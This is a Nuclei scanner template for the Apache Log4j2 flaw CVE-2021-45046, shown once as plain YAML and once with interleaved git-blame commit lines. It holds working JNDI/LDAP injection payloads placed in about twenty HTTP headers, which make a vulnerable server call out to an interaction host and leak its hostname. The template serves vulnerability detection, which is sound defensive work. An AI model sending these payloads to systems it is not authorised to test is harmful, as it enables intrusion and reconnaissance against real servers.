nuclei-templates/cves/2021/CVE-2021-45046.yaml

id: CVE-2021-45046

info:
  name: Apache Log4j2 Remote Code Injection
  author: ImNightmaree
  severity: critical
  description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
    - https://twitter.com/marcioalm/status/1471740771581652995
    - https://logging.apache.org/log4j/2.x/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cve-id: CVE-2021-45046
    cwe-id: CWE-502
  tags: cve,cve2021,rce,oast,log4j,injection

requests:
  - raw:
      - |
        GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

    extractors:
      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

# Enhanced by mp on 2022/02/28
Create CVE-2021-45046 (#3378) * Create CVE-2021-45046 * Update and rename CVE-2021-45046 to CVE-2021-45046.yaml * minor update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 15:41:50 +00:00			`id: CVE-2021-45046`

			`info:`
Enhancement: cves/2021/CVE-2021-45046.yaml by mp 2022-02-28 21:46:46 +00:00			`name: Apache Log4j2 Remote Code Injection`
Create CVE-2021-45046 (#3378) * Create CVE-2021-45046 * Update and rename CVE-2021-45046 to CVE-2021-45046.yaml * minor update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 15:41:50 +00:00			`author: ImNightmaree`
			`severity: critical`
Enhancement: cves/2021/CVE-2021-45046.yaml by mp 2022-02-28 18:56:15 +00:00			`description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.`
Create CVE-2021-45046 (#3378) * Create CVE-2021-45046 * Update and rename CVE-2021-45046 to CVE-2021-45046.yaml * minor update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 15:41:50 +00:00			`reference:`
			`- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/`
			`- https://twitter.com/marcioalm/status/1471740771581652995`
			`- https://logging.apache.org/log4j/2.x/`
Auto Generated CVE annotations [Thu Dec 23 15:43:46 UTC 2021] :robot: 2021-12-23 15:43:46 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.0`
Auto Generated CVE annotations [Thu Dec 23 15:43:46 UTC 2021] :robot: 2021-12-23 15:43:46 +00:00			`cve-id: CVE-2021-45046`
			`cwe-id: CWE-502`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2021,rce,oast,log4j,injection`
Create CVE-2021-45046 (#3378) * Create CVE-2021-45046 * Update and rename CVE-2021-45046 to CVE-2021-45046.yaml * minor update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 15:41:50 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}`
			`Accept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}`
			`Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}`
			`Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}`
			`Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}`
			`Authentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}`
			`Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}`
			`Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}`
			`Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}`
			`Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}`
			`Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}`
			`Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}`
			`User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}`
			`X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}`
			`X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}`
			`X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}`
			`X-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}`
			`X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
			`- "dns"`

			`- type: regex`
			`part: interactsh_request`
			`regex:`
			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output`

			`extractors:`
			`- type: regex`
			`part: interactsh_request`
			`group: 2`
			`regex:`
			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output`

			`- type: regex`
			`part: interactsh_request`
			`group: 1`
			`regex:`
			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output`
Enhancement: cves/2021/CVE-2021-45046.yaml by mp 2022-02-28 18:56:15 +00:00
			`# Enhanced by mp on 2022/02/28`